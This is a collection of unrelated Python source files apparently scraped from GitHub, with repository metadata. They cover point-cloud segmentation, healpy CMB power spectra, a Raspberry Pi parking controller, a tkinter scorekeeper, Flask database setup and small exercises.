2]-zmin-ground_dilate[i])))\n #print(ground_dilate[i])\n #potential_ground = potential_ground[np.abs(points[potential_ground, 2]-zmin-ground_dilate[i]) > 0.4]\n #if potential_ground.shape[0]>0:\n # print(potential_ground)\n is_obj[potential_ground] = u[0]\n #print(u[0])\n\n return is_obj","repo_name":"Alienor134/City-segmentation-3D","sub_path":"segmentation_func.py","file_name":"segmentation_func.py","file_ext":"py","file_size_in_byte":9634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33222720387","text":"def fromuser():\n f = open(\"quotes.txt\",\"a+\")\n print(\"Number of quotes you wish to enter: \")\n k = input()\n k1 = int(k)\n f.write(\"\\n\")\n for i in range(k1):\n print(\"Kindly enter quote number %d: \" % (i+1))\n user = input()\n f.write(\"%s\\n\" % user)\n f.close()\n print(\"\\n\")\n #Ask whether to print the new file\n print(\"Do you wish to see the updated file?\\nEnter Y for Yes and N for No :\")\n o = input()\n if o == \"Y\":\n print(\"\\n\")\n f = open(\"quotes.txt\",\"r\")\n quotes = f.readline()\n while (quotes):\n print(quotes)\n quotes = f.readline()\n f.close()\nif __name__ == \"__main__\":\n fromuser()\n\n \n \n\n","repo_name":"huzbadri53/python-random-quote","sub_path":"in-quote.py","file_name":"in-quote.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39022295914","text":"from localpdb import PDB\nimport toml\n\nfrom functions.files import write_json\nfrom functions.pdb import load_pdb_lists\nfrom rich.console import Console\n\n\nconsole = Console()\n\n\nconfig = toml.load('config.toml')\n\nclass_i = load_pdb_lists('class_i', config['WAREHOUSE_PATH'], console)\n\n\nlpdb = PDB(db_path=config['LOCALPDB_PATH'])\n\nalpha_fold_sets = {}\n\nalpha_fold_date_cutoff = 20180430\nalpha_fold_resolution_cutoff = 8\n\npdb_after_cutoff = lpdb.entries.query(f'deposition_date >= {alpha_fold_date_cutoff} & resolution <= 8')\npdb_before_cutoff = lpdb.entries.query(f'deposition_date < {alpha_fold_date_cutoff} & resolution <= 8')\n\nprint (len(pdb_after_cutoff))\nprint (len(pdb_before_cutoff))\n\nmhc_after_cutoff = [pdb_code for pdb_code in pdb_after_cutoff.index if pdb_code in class_i]\nmhc_before_cutoff = [pdb_code for pdb_code in pdb_before_cutoff.index if pdb_code in class_i]\n\nprint (len(class_i))\n\nprint (len(mhc_after_cutoff))\nprint (len(mhc_before_cutoff))\n\n\n\n\n\nall_under_8 = set(mhc_after_cutoff) | set(mhc_before_cutoff)\n\nprint (len(all_under_8))\n\nexcluded = set(class_i) - all_under_8\n\nprint (len(excluded))\n\nprint (excluded)\n\nalpha_fold_sets['before_date_cutoff'] = mhc_before_cutoff\nalpha_fold_sets['after_date_cutoff'] = mhc_after_cutoff\nalpha_fold_sets['over_8_angstroms'] = [pdb_code for pdb_code in excluded]\n\nprint (alpha_fold_sets)\n\n\nfilepath = f'{config[\"CONSTANTS\"]}/alpha_fold_sets.json'\nwrite_json(filepath, alpha_fold_sets, verbose=True, pretty=True)\n\n","repo_name":"histofyi/original-pipeline","sub_path":"steps/split_into_alpha_fold_sets.py","file_name":"split_into_alpha_fold_sets.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32197811738","text":"import cv2\r\nimport numpy as np\r\n\r\ndef draw_circle(event,x,y,flags,param):\r\n \r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n cv2.circle(img,(x,y),100,(0,255,0),-1)\r\n \r\n if event == cv2.EVENT_RBUTTONDOWN:\r\n \r\n cv2.circle(img,(x,y),100,(0,0,255),-1)\r\n \r\n if event == cv2.EVENT_MBUTTONDOWN:\r\n cv2.circle(img,(x,y),100,(255,255,255),-1) \r\n \r\ncv2.namedWindow(winname='drawing')\r\n\r\ncv2.setMouseCallback('drawing',draw_circle)\r\n\r\nimg = np.zeros((512,512,3), np.int8)\r\n\r\nwhile True: \r\n cv2.imshow('drawing',img)\r\n \r\n if cv2.waitKey(20) & 0xFF == 27:\r\n break\r\n \r\ncv2.destroyAllWindows()","repo_name":"ShaunMoloi/Images_Numpy","sub_path":"Shape.py","file_name":"Shape.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71292894954","text":"from os import getenv\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom dotenv import load_dotenv\nfrom flask import g\n\nload_dotenv()\n\n#connect to database using env variable\nengine = create_engine(getenv('DB_URL'), echo=True, pool_size=20, max_overflow=0)\n#handles the connection to the db\nSession = sessionmaker(bind=engine)\n#generates temporary connections for performing create, read, update, and delete operations\nBase = declarative_base()\n#helps map the models to real mysql tables\n\ndef init_db(app):\n Base.metadata.create_all(engine)\n app.teardown_appcontext(close_db)\n\n\n#the function saves the current connect ont he g object if it is not already there..\n# then it returns the connection form the g object instead of creating a new session\ndef get_db():\n if 'db' not in g:\n #store db connection in app context\n g.db = Session()\n \n return g.db\n\ndef close_db(e=None):\n db = g.pop('db', None)\n\n if db is not None:\n db.close()","repo_name":"eburger939/python-newsfeed","sub_path":"app/db/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42933959323","text":"# Billing systems\r\n\r\n#PF-Assgn-23\r\ndef calculate_bill_amount(gems_list, price_list, reqd_gems,reqd_quantity):\r\n bill_amount= 0\r\n Total_bill =[]\r\n\r\n for i in range(len(reqd_gems)):\r\n for j in reqd_gems:\r\n if j in gems_list:\r\n\r\n if reqd_gems[i] == gems_list[0]:\r\n bill_amount = reqd_quantity[i] * price_list[0]\r\n Total_bill.append(bill_amount)\r\n\r\n elif reqd_gems[i] == gems_list[1]:\r\n bill_amount = reqd_quantity[i] * price_list[1]\r\n Total_bill.append(bill_amount)\r\n\r\n elif reqd_gems[i] == gems_list[2]:\r\n bill_amount = reqd_quantity[i] * price_list[2]\r\n Total_bill.append(bill_amount)\r\n\r\n elif reqd_gems[i] == gems_list[3]:\r\n bill_amount = reqd_quantity[i] * price_list[3]\r\n Total_bill.append(bill_amount)\r\n\r\n elif reqd_gems[i] == gems_list[4]:\r\n bill_amount = reqd_quantity[i] * price_list[4]\r\n Total_bill.append(bill_amount)\r\n\r\n else:\r\n return -1\r\n\r\n if sum(Total_bill) >= 30000:\r\n bill_amount = 30000-((5/100)*30000)\r\n else:\r\n bill_amount = sum(Total_bill)\r\n\r\n return bill_amount\r\n\r\n#List of gems available in the store\r\ngems_list=['Amber', 'Aquamarine', 'Opal', 'Topaz']\r\n\r\n#Price of gems available in the store. gems_list and price_list have one-to-one correspondence\r\nprice_list=[4316, 1342, 8734, 6421]\r\n\r\n#List of gems required by the customer\r\nreqd_gems=['Amber', 'Topaz']\r\n\r\n#Quantity of gems required by the customer. reqd_gems and reqd_quantity have one-to-one correspondence\r\nreqd_quantity=[1, 4]\r\n\r\nbill_amount=calculate_bill_amount(gems_list, price_list, reqd_gems, reqd_quantity)\r\nprint(bill_amount)","repo_name":"mathankrish/Infy-Programs","sub_path":"InfyTq Basic Programming/Day3/Day3Ass23.py","file_name":"Day3Ass23.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29744827454","text":"#from gpiozero import Buzzer\nimport RPi.GPIO as GPIO\nimport time\nimport socket\nimport threading\n\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nport=4971\nconnect=True\ns.connect(('192.168.0.10',port))\nclientRunning=True\n\nButton1=10 #empty parking lot\nLED=16 #LED\nline_button=8 #warning system\nwarningsign=7 #piezo buzzer\nflap=32 #flap->survo motor\ntrig=11 #sensor\necho=12 #sensor\ntollbar= 15 # tollbar\n\nempty={'1':'Button1','2':'Button2','3':'Button3'} #empty parking lot list\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\n\n\nGPIO.setup(warningsign,GPIO.OUT)\nGPIO.setup(Button1,GPIO.IN,pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(line_button,GPIO.IN,pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(LED,GPIO.OUT)\nGPIO.setup(flap,GPIO.OUT)\nGPIO.setup(tollbar,GPIO.OUT)\nGPIO.setup(trig, GPIO.OUT)\nGPIO.setup(echo,GPIO.IN)\n\n\np1=GPIO.PWM(flap,50)\np2=GPIO.PWM(tollbar,50)\nbutton_press=GPIO.input(Button1)\n\n\n\n#pressure detect #presscount%2==0 in&out #presscount%2==1 in \n\ndef press(s):\n presscount=0\n while True:\n count=0\n GPIO.output(LED,True)\n if GPIO.input(Button1)==GPIO.HIGH:\n presscount+=1\n print('ready for parking')\n time.sleep(1)\n while GPIO.input(Button1)==GPIO.LOW:\n GPIO.output(LED,False) #turn off LED\n if presscount%2==1:\n count+=1\n time.sleep(1)\n print(count)\n if count>=5:\n print(\"no.1 is full\")\n \n \n #activate flap\n\n \n p1.start(12.5)\n p1.ChangeDutyCycle(7.5)\n time.sleep(1)\n #p1.ChangeDutyCycle(7.5)\n msg = '1'\n if msg=='1':\n s.send(bytes(msg,'utf-8'))\n #count=0\n #presscount=0\n \n\n break\n \n else:\n break\n'''\ndef press(s): \n presscount=0\n while True:\n count=0\n GPIO.output(LED, True)\n if GPIO.input(Button1)==GPIO.HIGH: #button pressed\n print(\"ready for parking\")\n presscount+=1\n time.sleep(1)\n while GPIO.input(Button1)==GPIO.LOW: #After button pressed\n if presscount%2==1:\n count+=1\n time.sleep(1)\n print(count)\n if count>=3 : #button pressed--->not pressed----->10sec----->parked\n print(\"no.1 is full\")\n del empty['1'] #delete from empty parking lot list\n GPIO.output(LED,False) #turn off LED\n p1.start(7.5)\n p1.ChangeDutyCycle(7.5) #activate flap\n time.sleep(1)\n p1.ChangeDutyCycle(12.5)\n msg = '1'\n s.send(bytes(msg,'utf-8'))\n presscount=0 \n break\n \n #if button1 interrupt,count again from 0\n else:\n break\n #if money paid sign income-> p.start(12.5) /p.ChangeDutyCycle(12.5)/p.ChangeDutyCycle(7.5)\n #empty[i]='button i'\n''' \ndef warning():\n while True:\n if GPIO.input(line_button)==GPIO.HIGH:#if button pressed\n print(\" buzzer activate\")\n while GPIO.input(line_button)==GPIO.HIGH: #while button pressed activate buzzer\n GPIO.output(warningsign,0)\n time.sleep(.2) \n GPIO.output(warningsign,1)\n time.sleep(.2)\n\ndef Entrance():\n while True:\n count=0\n #caculate distance\n GPIO.output(trig,False)\n time.sleep(0.5)\n\n GPIO.output(trig,True)\n time.sleep(0.00001)\n GPIO.output(trig,False)\n\n while GPIO.input(echo)==0:\n pulse_start=time.time()\n\n while GPIO.input(echo)==1:\n pulse_end=time.time()\n\n pulse_duration= pulse_end - pulse_start\n distance=pulse_duration *17000\n distance=round(distance,2)\n \n \n # if distance<10 activate survo motor (toll bar)\n if int(distance)<10:\n p2.start(7.5)\n #activate flap\n \n p2.ChangeDutyCycle(12.5)\n for i in range(5):\n \n time.sleep(1)\n \n p2.ChangeDutyCycle(7.5)\n\n\ndef reset(s):\n msg = 0\n while clientRunning:\n msg=s.recv(1024)\n msg = str(msg,'utf-8')\n print(msg)\n if msg=='1': #msg recv\n GPIO.output(LED,True) #turn on LED\n \n p1.start(7.5) # flap reset\n p1.ChangeDutyCycle(12.5)\n \n \n #if money paid sign income-> p.start(12.5) /p.ChangeDutyCycle(12.5)/p.ChangeDutyCycle(7.5)\n #empty[i]='button i'\n ###### cleanup nonreservation system\n \n\n#press() warning() Entrance() reset(s)\ndef main():\n threading.Thread(target=reset, args=(s,)).start()\n threading.Thread(target=press,args=(s,)).start()\n threading.Thread(target=warning).start()\n threading.Thread(target=Entrance).start() \n\nmain()\n","repo_name":"hyorard/parkTowerProject","sub_path":"press.py","file_name":"press.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11136047773","text":"from quixote_utils import RootDirectory\nfrom quixote.form.form import Form\nfrom quixote.form.widget import *\nfrom bookdb import Book, BookDatabase\n\nclass DBInterface(RootDirectory):\n _q_exports = [\"\", \"show\", \"add_book\", \"edit_book\"]\n def __init__(self, db):\n super(DBInterface, self).__init__()\n self.db = db\n self.currentbook = self.db.get_book(\"000000\")\n def _q_index(self):\n return \"\"\"Welcome to our online library!

    \n Please go to our
    show page.\"\"\"\n def show(self):\n return \"list of books\"\n def edit_book(self):\n \"\"\n form = Form()\n for field in Book.FIELDS:\n form.add(StringWidget, field, title=field,\n value=getattr(self.currentbook, field))\n form.add(SubmitWidget, \"submit\")\n if not form.is_submitted():\n return form.render()\n else:\n self.db.edit_book(self.currentbook.dbkey,\n *[form[field] for field in Book.FIELDS])\n self.db.commit()\n return \"The book has been edited!\"\n \n def add_book(self):\n form = Form()\n for field in Book.FIELDS:\n form.add(StringWidget, field, title=field)\n form.add(SubmitWidget, \"submit\")\n if not form.is_submitted():\n return form.render()\n else:\n self.db.add_book(*[form[field] for field in Book.FIELDS])\n self.db.commit()\n return \"A new book has been added!\"\n \n def add_from_text_file(self):\n return \"Please choose the book file.\"\n\n\nroot = DBInterface(BookDatabase(\"books\"))\nroot.publish_show(\"edit_book\", browser=\"mozilla\")\n","repo_name":"micheles/papers","sub_path":"pypers/bolzano/db/BooksOnline.py","file_name":"BooksOnline.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"7603883997","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 5 17:09:55 2017\n\n@author: camila\n\n -- Aula 9 --\n\n\"\"\"\n#%%\n\"\"\"\nSTEP 1: Import the packages\n\"\"\"\n\nimport healpy as hp\nimport matplotlib\nfrom matplotlib import pyplot # ***\nimport numpy as np\n\n# The following comands allow us to define the size of the characteres \n# at the mollview visualization.\nfontsize = 20\nmatplotlib.rcParams.update({'font.size':fontsize})\n\n#%%\n\"\"\"\nSTEP 2: Spherical harmonic transforms: map --> Cls\n\"\"\"\n###################################\n# Calculating Cls from a CMB map:::\n\n# Just for temperature:::\nmapa = hp.read_map('COM_CMB_IQU-smica_1024_R2.02_full.fits')\n\nCls_TT = hp.anafast(mapa)\n\n# For temperature and polarization:::\nmapa = hp.read_map('COM_CMB_IQU-smica_1024_R2.02_full.fits', field=[0,1,2])\n\nCls = hp.anafast(mapa)\n\nCls_TT = Cls[0]\nCls_EE = Cls[1]\nCls_BB = Cls[2]\nCls_TE = Cls[3]\nCls_EB = Cls[4]\nCls_TB = Cls[5]\n\n\n#########\n# Plot:::\n\n# TT:::\nlmax = len(Cls_TT)\nell = np.arange(lmax)\n\nDls_TT = ell*(ell+1)*Cls_TT/(2.*np.pi)\n\npyplot.plot(ell, Dls_TT,linewidth=2.0, color=\"red\") #label=\"CMB Cls\"\n#\n#plt.ylim(-300.,1000.)\n#pyplot.xscale('log')\npyplot.title('Calculated Angular Power Spectrum - TT',fontsize=20)\npyplot.xlabel('Multipole, $\\ell$',fontsize=20)\npyplot.ylabel('$[\\ell(\\ell + 1)/2\\pi] C_\\ell^{TT}$ $[K^2]$',fontsize=20)\n#pyplot.legend(loc='best')\n#\nfig = pyplot.gcf()\nfig.set_size_inches(10, 6)\npyplot.savefig(\"Cls.png\")\npyplot.show()\n\n#-----\nres = hp.nside2resol(1024, arcmin = True)\nprint('Resolution=', res, 'arcmin')\n\ntheta = (180./lmax)*60.\nprint('Theta=', theta, 'arcmin')\n#-----\n\n# EE:::\n\npyplot.plot(ell, Cls_EE,linewidth=2.0, color=\"red\") # label=\"CMB Cls\"\n#\npyplot.title('Calculated Angular Power Spectrum - EE',fontsize=20)\npyplot.xlabel('Multipole, $\\ell$',fontsize=20)\npyplot.ylabel('$C_\\ell^{EE}$ $[K^2]$',fontsize=20) # ($\\mu K^2$)')\npyplot.legend(loc='best')\n\nfig = pyplot.gcf()\nfig.set_size_inches(10, 6)\npyplot.savefig(\"Cls_EE.png\")\npyplot.show()\n\n\n# BB:::\n# TE:::\n\nDls_TE = ell*(ell+1)*Cls_TE/(2.*np.pi)\n\npyplot.plot(ell, Dls_TE,linewidth=2.0, color=\"red\") # label=\"CMB Cls\"\n#\npyplot.title('Calculated Angular Power Spectrum - EE',fontsize=20)\npyplot.xlabel('Multipole, $\\ell$',fontsize=20)\npyplot.ylabel('$[\\ell(\\ell + 1)/2\\pi] C_\\ell^{TE}$ $[K^2]$',fontsize=20) # ($\\mu K^2$)')\npyplot.legend(loc='best')\n\nfig = pyplot.gcf()\nfig.set_size_inches(10, 6)\npyplot.savefig(\"Cls_TE.png\")\npyplot.show()\n\n\n# EB:::\n# TB:::\n\n#%%\n\"\"\"\nSTEP 3: Spherical harmonic transforms: Cls --> fits file (writing the Cls in a fits file)\n\"\"\"\n# For one Cls array:\nhp.write_cl('calc_Cls.fits', Cls[0])\n\n# For all:\nhp.write_cl('calc_Cls.fits', Cls)\n\n\n#%%\n\"\"\"\nSTEP 4: Spherical harmonic transforms: fits file --> Cls (reading Cls from a fits file)\n\"\"\"\n# To open just the FIRST extension:\nCls2 = hp.read_cl('COM_PowerSpect_CMB_R2.02.fits', h=True) #h=True or False does not work.\n\n\n# To access the header and chose the extension you want to open:\nfrom astropy.io import fits\nhdulist = fits.open('COM_PowerSpect_CMB_R2.02.fits')\nhdulist.info()\n\nCls_TTLOLUNB = hp.read_cl(hdulist[1])\nCls_TTHILUNB = hp.read_cl(hdulist[8])\n\nn1 = len(Cls_TTLOLUNB[0])\nn2 = len(Cls_TTHILUNB[0])\nn = n1 + n2\n\nell=np.zeros(n)\nDls=np.zeros(n)\n\nell[0:n1] = Cls_TTLOLUNB[0]\nell[n1:n] = Cls_TTHILUNB[0]\nDls[0:n1] = Cls_TTLOLUNB[1]\nDls[n1:n] = Cls_TTHILUNB[1]\n\npyplot.plot(ell, Dls,linewidth=2.0, color=\"red\") \npyplot.title('Angular Power Spectrum',fontsize=20)\npyplot.xlabel('Multipole, $\\ell$',fontsize=20)\npyplot.ylabel('$[\\ell(\\ell + 1)/2\\pi] C_\\ell^{TT}$ $[\\mu K^2]$',fontsize=20) # ($\\mu K^2$)')\nfig = pyplot.gcf()\nfig.set_size_inches(10, 6)\npyplot.savefig(\"Cls_TT2.png\")\npyplot.show()\n","repo_name":"cpnovaes/Healpy-Classes","sub_path":"HealpyCodes/aula9.py","file_name":"aula9.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22169965174","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Feb 12 20:50:00 2022\r\n\r\n@author: R.U.S.T.E.A.M\r\n\"\"\"\r\n\r\nn = int(input())\r\na = []\r\nfor i in range(n):\r\n x = int(input())\r\n k = bin(x).count('1')\r\n a.append(k)\r\nfor i in a:\r\n print(i)","repo_name":"rustamabdukakhorov/Robocontest","sub_path":"051.py","file_name":"051.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"40604906395","text":"# coding:utf8\n#解析器\nfrom bs4 import BeautifulSoup\nimport re\nimport urllib.parse\nclass HtmlParser(object):\n\n\n def _get_new_url(self, page_url, soup, is_full):\n links = soup.find_all('a', href=re.compile(r'-chapter-'))\n if len(links) == 0:\n print('匹配失败')\n return\n new_urls = set()\n for link in links:\n new_url = link['href']\n if is_full:\n new_url = urllib.parse.urljoin(page_url, new_url)\n new_urls.add(new_url)\n return new_urls\n\n\n pass\n\n def _get_new_data(self, page_url, soup):\n res_data = {}\n res_data['url'] = page_url\n #https://hellotranslations.wordpress.com/2015/01/30/dou-po-cang-qiong-chapter-1/\n title = soup.find_all('div', class_='collapseomatic_content')\n res_data['title'] = title.get_text()\n summry_node = soup.find('div', itemprop='articleBody').find_all('p')\n if len(summry_node) > 2:\n summry_node = summry_node[1].get_text()\n res_data['summary'] = summry_node\n\n with open('') as f:\n f.read()\n return res_data\n\n\n def parse(self, page_url, html_cont, is_full):\n if page_url is None or html_cont is None:\n return\n soup = BeautifulSoup(html_cont, 'html.parser', from_encoding='ut-8')\n new_urls = self._get_new_url(page_url, soup, is_full)\n new_data = self._get_new_data(page_url, soup)\n return new_urls, new_data","repo_name":"DSPerson/pa","sub_path":"baike_spider/html_parser.py","file_name":"html_parser.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31147243001","text":"\"\"\" Given the following program and input, what is printed:\r\nCana\r\nSan\r\nSan\r\nPlata\r\nDomingo\r\n\"\"\"\r\n\r\ndef main():\r\n infile = open(\"infile.txt\", \"r\")\r\n for line in infile:\r\n index = line.find(\" \")\r\n if line.find(\"de\") > -1:\r\n print( line[:index] )\r\n else:\r\n print( line[index+1:], end=\"\" )\r\nmain()\r\r\n","repo_name":"Reikenzan/Some-Python","sub_path":"SomeWork/Fall2013/Q_6.py","file_name":"Q_6.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11437943777","text":"#import the modules\nfrom tkinter import * #get tkinter, used to make the GUI\nimport os.path #get os.path, used to get images\nimport PIL.Image, PIL.ImageTk #get pil, used to get images\nimport time #get time, used in animation\n\n#define the root window\nroot = Tk() #make the window\nroot.title(\"Scorekeeper\") #Title the window\n\n#create 2 stringvars for the two scores\nscore1 = StringVar() #create a varible for player 1 score\nscore1.set('0.0') #initiate it\n\nscore2 = StringVar() #create a variable for player 2 score\nscore2.set('0.0') #initiate it\n\n#create stringvar for winning score\nwinningScore = StringVar() #create a variable for winning score\nwinningScore.set('999999999999999') #initiate it impossibly high\n\n#define 4 functions which can add, subtract the 2 scores based on button presses\ndef add1(): #define the function\n number = float(score1.get()) #get the existing score\n newNumber = number + 1 #add 1\n score1.set(str(newNumber)) #set the variable to the new score\n answer.set(newNumber) #change the display to show the new score\n compare = float(winningScore.get()) #get the winning score so you can compare\n if newNumber == compare:#check if the users score is the winning score\n button1.config(state='disabled') #disable buttons\n button2.config(state='disabled') #disable buttons\n button3.config(state='disabled') #disable buttons\n button4.config(state='disabled') #disable buttons\n for x in range(0, 210): #animate the text\n canvas2.move(2, 1, 0) #move the text\n root.update() #update to show the new text position\n time.sleep(0.01) #wait a bit to make it look like it is moving\n trophy() #call the function that makes the trophy come on\n \ndef sub1(): #define function\n number = float(score1.get()) #get existing score\n newNumber = number - 1 #subtract 1\n score1.set(str(newNumber)) #set the variable to the new score\n answer.set(newNumber) #change the display to the new score\n compare = float(winningScore.get()) #get the winning score so they can be compared\n if newNumber == compare:#check if the score is the winning score\n button1.config(state='disabled') #disable buttons\n button2.config(state='disabled') #disable buttons\n button3.config(state='disabled') #disable buttons\n button4.config(state='disabled') #disable buttons\n for x in range(0, 210): #animate the text\n canvas2.move(2, 1, 0) #move it\n root.update() #show\n time.sleep(0.01) #wait a bit\n trophy() #animate the trophy\n\ndef add2(): #define function\n number = float(score2.get()) #get existing score\n newNumber = number + 1 #add 1\n score2.set(str(newNumber)) #change the variable\n answer2.set(newNumber)# change the display\n compare = float(winningScore.get()) #get the winning score\n if newNumber == compare: #see if the score is the winning score\n button1.config(state='disabled') #disable buttons\n button2.config(state='disabled') #disable buttons\n button3.config(state='disabled') #disable buttons\n button4.config(state='disabled') #disable buttons\n for x in range(0, 210): #animate text\n canvas2.move(3, 1, 0) #move text on\n root.update() #show it\n time.sleep(0.01) #wait a bit\n trophy() #animate trophy\n\ndef sub2(): #define function\n number = float(score2.get()) #get existing score\n newNumber = number - 1 #subtract 1\n score2.set(str(newNumber)) #set the variable\n answer2.set(newNumber) #change the display\n compare = float(winningScore.get()) #compare the two\n if newNumber == compare: #if the score is the winning score\n button1.config(state='disabled') #disable buttons\n button2.config(state='disabled') #disable buttons\n button3.config(state='disabled') #disable buttons\n button4.config(state='disabled') #disable buttons\n for x in range(0, 210): #animate text\n canvas2.move(3, 1, 0) #move text on\n root.update() #show it\n time.sleep(0.01) #wait a bit\n trophy() #animate trophy\n\n#function to set the winning score\ndef setscore(): #define function\n number = entrybox.get() #get the input\n winningScore.set(str(number)) #set the variable\n entrybox.config(state='disabled') #disable entrybox\n\n#create the title canvas\ncanvas = Canvas(root, background='white', height=100) #make canvas for the title\ncanvas.grid(row=0, column=0, columnspan=5) #position it\n\n#create the animation canvas \ncanvas2 = Canvas(root, height = 200, width=287, background='white') #make canvas\ncanvas2.grid(row=7, column=1, columnspan=5) #position it\n\n#define the 4 buttons to control increasing and decreasing score\nbutton1 = Button(text=\"+\", command=add1, activebackground='green') #create button\nbutton1.grid(row=5,column=1) #position it\n\nbutton2 = Button(text=\"-\", command=sub1) #create button\nbutton2.grid(row=5,column=2) #position it\n\nbutton3 = Button(text=\"+\", command=add2) #create button\nbutton3.grid(row=5,column=3) #position it\n\nbutton4 = Button(text=\"-\", command=sub2) #create button\nbutton4.grid(row=5,column=4) #position it\n\n#define 2 variables which are bound to the labels holding the score\nanswer = StringVar() #create it for player 1\nanswer2 = StringVar() #create it for player 2\n\n#create 2 text boxes to hold the 2 scores being displayed\ntext = Label(root, text='0.0', textvariable=answer)\ntext.grid(row=3, column=1, columnspan=2)\n\ntext2 = Label(root, text='0.0', textvariable=answer2)\ntext2.grid(row=3, column=3, columnspan=2)\n\n#create the form to set a winning score\nentrybox = Entry(root, width=5) #make the entry box\nentrybox.grid(row=6, column=1, columnspan=1) #position it\n\nwinningButton = Button(root, text='Set Winning Score', command=setscore) #make the button\nwinningButton.grid(row=6, column=2, columnspan=3) #position it\n\n# Get a filename in the same directory as this program\ndirectory = os.path.dirname(os.path.abspath(__file__)) #use OS to get path\nfilename = os.path.join(directory, 'image.jpg') #attatch path to filename\n\n# Open the image file and convert to an ImageTk object\nimg = PIL.Image.open(filename) # create a PIL.Image from the jpg file\ntkimg = PIL.ImageTk.PhotoImage(img, master=root) # convert the PIL.Image to a PIL.TkImage\n\n# Get a filename in the same directory as this program\ndirectory2 = os.path.dirname(os.path.abspath(__file__)) #use OS to get path\nfilename2 = os.path.join(directory2, 'download.jpg') #connect it to filename\n\n# Open the image file and convert to an ImageTk object\nimg2 = PIL.Image.open(filename2) # create a PIL.Image from the jpg file\ntkimg2 = PIL.ImageTk.PhotoImage(img2, master=root) #convert it\n\n# Add the ImageTk object to the canvas.\nicon = canvas.create_image(145, 53, image=tkimg) #add title image\nicon2 = canvas2.create_image(145, 53, image=tkimg2) #add other image\n\n#create the animation canvas\ncanvas2 = Canvas(root, height = 200, width=287, background='pink') #create second canvas\ncanvas2.grid(row=7, column=1, columnspan=5) #position it\n\n#animate it\ntext1 = canvas2.create_text(-1, 100, fill='black', text='Who Will Win???') #add initial text\n\n#create winner texts for future animation\nwin1text = canvas2.create_text(-60, 130, fill='red', text='PLAYER 1 WINS!!') #1 win text\nwin2text = canvas2.create_text(-60, 130, fill='blue', text='PLAYER 2 WINS!!')# 2 win text\n\n#animation functions\ndef trophy(): #define function\n trophy = canvas2.create_image(-15, 60, image=tkimg2, tag='trophy') #make image\n for x in range(0, 80): #80 times\n canvas2.move('trophy', 2, 0) #move image\n root.update() #show mvt\n time.sleep(0.02) #wait a bit\n \ndef animate(): #define function\n for x in range(0, 75): #75 times\n canvas2.move(1, 2, 0) #move image\n root.update() #show mvt\n time.sleep(0.02) #wait a bit\nanimate() #animate it\n\n#enter into the main loop\nroot.mainloop()\n","repo_name":"bethpol/ScorekeeperGUI","sub_path":"Bpolito_Sharisrikanth_GUIproject.py","file_name":"Bpolito_Sharisrikanth_GUIproject.py","file_ext":"py","file_size_in_byte":7944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23552027905","text":"import cv2\n\ndef data_gen(img_folder, mask_folder, batch_size):\n c = 0\n n = os.listdir(img_folder) #List of training images\n random.shuffle(n)\n \n while (True):\n img = np.zeros((batch_size, 512, 512, 3)).astype('float')\n mask = np.zeros((batch_size, 512, 512, 1)).astype('float')\n\n for i in range(c, c+batch_size): #initially from 0 to 16, c = 0. \n\n train_img = cv2.imread(img_folder+'/'+n[i])/255.\n train_img = cv2.resize(train_img, (512, 512))# Read an image from folder and resize\n \n img[i-c] = train_img #add to array - img[0], img[1], and so on.\n \n\n train_mask = cv2.imread(mask_folder+'/'+n[i], cv2.IMREAD_GRAYSCALE)/255.\n train_mask = cv2.resize(train_mask, (512, 512))\n train_mask = train_mask.reshape(512, 512, 1) # Add extra dimension for parity with train_img size [512 * 512 * 3]\n\n mask[i-c] = train_mask\n\n c+=batch_size\n if(c+batch_size>=len(os.listdir(img_folder))):\n c=0\n random.shuffle(n)\n # print \"randomizing again\"\n yield img, mask\n\n\n\n\ntrain_frame_path = '/path/to/training_frames'\ntrain_mask_path = '/path/to/training_masks'\n\nval_frame_path = '/path/to/validation_frames'\nval_mask_path = '/path/to/validation_frames'\n\n# Train the model\ntrain_gen = data_gen(train_frame_path,train_mask_path, batch_size = 4)\nval_gen = data_gen(val_frame_path,val_mask_path, batch_size = 